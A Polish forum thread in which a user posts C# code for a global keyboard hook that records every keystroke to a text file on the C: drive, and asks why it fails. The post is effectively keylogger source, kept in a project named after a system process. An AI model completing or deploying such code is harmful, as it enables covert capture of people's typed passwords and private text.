Hak na klawiaturę - nie działa

0

Próbuję zrobić w programie globalny hak na klawiaturę. Posklejałem trochę kodu z różnych przykładów, próbowałem to analizować krok po kroku, wszystko niby działa a efektu nie ma. Po wciśnięciu button1 ma nastąpić instalacja haka a po button2 deinstalacja. W trakcie wszystko to, co przeleci przez hak ma lądować w pliku tekstowym na dysku C. Niestety ten plik wcale nie powstaje, nie wiem dlaczego. Całość sklejałem w oparciu o to. Oto cały kod:

Najpierw DLL-ka:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.IO;

namespace DLL
{
  public class PrzechwytDLL
  {
    private static char caughtChar;
    private static string path = "C:\\plik.txt";
    private const byte VK_SHIFT = 0x10;
    private const byte VK_CAPITAL = 0x14;
    private static bool CapsLockDown;
    private static bool ShiftDown;
    private const uint WM_KEYDOWN = 0x0100;
    [DllImport("user32.dll")]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr
    wParam, IntPtr lParam);

    [DllImport("user32.dll")]
    private static extern int ToAscii(uint uVirtKey, uint uScanCode, byte[]
    lpKeyState, ref char lpChar, uint flags);

    [DllImport("user32.dll")]
    private static extern bool GetKeyboardState(byte[] data);

    [DllImport("user32.dll")]
    static extern short GetKeyState(int nVirtKey);

    private static void SaveChar(char theChar, string where)
    {
      if (File.Exists(where))
      {
        using (StreamWriter sw = File.AppendText(where))
        {
          sw.Write(theChar);
          // nowa linia
          if (theChar == '\r')
            sw.Write('\n');
        }
      }
      else
      {
        using (StreamWriter sw = File.CreateText(where))
        {
          sw.Write(theChar);
          if (theChar == '\r')
            sw.Write('\n');
        }
      }
    }
    private static char GetChar(int vkCode)
    {
      byte[] data = new byte[256];
      GetKeyboardState(data);
      char myChar = ' ';
      uint scan = 0;
      ToAscii((uint)vkCode, scan, data, ref myChar, 0);
      return myChar;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct KBDLLHOOKSTRUCT
    {
      public int vkCode;
      public int scanCode;
      public int flags;
      public int time;
      public int dwExtraInfo;
    }
    public static IntPtr MonitorFunction(int code, IntPtr wParam, IntPtr lParam)
    {
      try
      {
        if (wParam.ToInt64() == WM_KEYDOWN && code >= 0)
        {
          KBDLLHOOKSTRUCT hookStruct =
          (KBDLLHOOKSTRUCT)Marshal.PtrToStructure(lParam, typeof(KBDLLHOOKSTRUCT));
          // Shift wciśnięty ??
          ShiftDown = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true :
          false);
          // Tryb pisania dużymi literami włączony ??
          CapsLockDown = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
          caughtChar = GetChar(hookStruct.vkCode);
          if ((CapsLockDown ^ ShiftDown) && Char.IsLetter(caughtChar))
            caughtChar = Char.ToUpper(caughtChar);
          if ((caughtChar == 0x0d && hookStruct.vkCode == 0x0d) ||
          (caughtChar > 0x20 && caughtChar <= 0x7e) ||
          (caughtChar == 0x20 && hookStruct.vkCode == 0x20))
            SaveChar(caughtChar, path);
        }
      }
      catch { }
      return CallNextHookEx(IntPtr.Zero, code, wParam, lParam);
    }
  }
}

Potem klasa haka:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Runtime.InteropServices;
using System.Reflection;

namespace WindowsFormsApplication1
{
  class Hak
  {
    private delegate IntPtr HookProc(int code, IntPtr wParam, IntPtr lParam);
    private static HookProc hookProc;
    private IntPtr result;
    private const int WH_KEYBOARD_LL = 0x0d;
    [DllImport("user32.dll")]
    private static extern IntPtr SetWindowsHookEx(int code, HookProc func, IntPtr hInstance, int threadID);
    [DllImport("user32.dll")]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);
    [DllImport("Kernel32.dll")]
    private static extern IntPtr GetModuleHandle(string moduleName);

    private bool GetHookProc()
    {
      try
      {
        string sc = @"E:\Dokumenty\Visual Studio 2010\Projects\svchost\ClassLibrary1\bin\Debug\ClassLibrary1.dll";
        Assembly a = Assembly.LoadFrom(sc);
        Type[] tab = a.GetExportedTypes();
        MethodInfo methodInfo = null;
        foreach (Type t in tab)
        {
          methodInfo = t.GetMethod("MonitorFunction");
          if (methodInfo != null)
            break;
        }
        hookProc = (HookProc)Delegate.CreateDelegate(typeof(HookProc), methodInfo);
        return true;
      }
      catch
      {
        return false;
      }
    }

    public bool InstallHook()
    {
      try
      {
        if (GetHookProc())
        {
          result = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, GetModuleHandle(@"E:\Dokumenty\Visual Studio 2010\Projects\svchost\ClassLibrary1\bin\Debug\ClassLibrary1.dll"), 0);
          return true;
        }
        else
          return false;
      }
      catch
      {
        return false;
      }
    }

    public void CloseHook()
    {
      UnhookWindowsHookEx(result);
    }
  }
}

Na końcu forma:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;

namespace WindowsFormsApplication1
{
  public partial class Okno : Form
  {
    private Hak klasaHak = new Hak();
    public Okno()
    {
      InitializeComponent();
    }

    private void button1_Click(object sender, EventArgs e)
    {
      klasaHak.InstallHook();
    }

    private void button2_Click(object sender, EventArgs e)
    {
      klasaHak.CloseHook();
    }
  }
}

Cały kod wykonuje się prawidłowo, nie ma po drodze żadnych wyjątków ani nic. Problem musi tkwić w tej bibliotece DLL.

0

Ej, nikt mi nie pomoże?

Dodam kilka szczegółów, początkowo w metodzie GetHookProc() pętla wyglądała tylko tak:

foreach (Type t in tab)
        {
          methodInfo = t.GetMethod("MonitorFunction");
        }

ale po wykonaniu pętli methodInfo przyjmowało wartość null i był wyjątek. Kiedy dodałem

 if (methodInfo != null)
            break;

wyjątek znikł, a zmienna przyjmuje prawidłową(chyba) wartość int code, IntPtr wParam, IntPtr lParam. Może tu jest problem.

Dodam, że SetWindowsHookEx() zwraca 0.

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0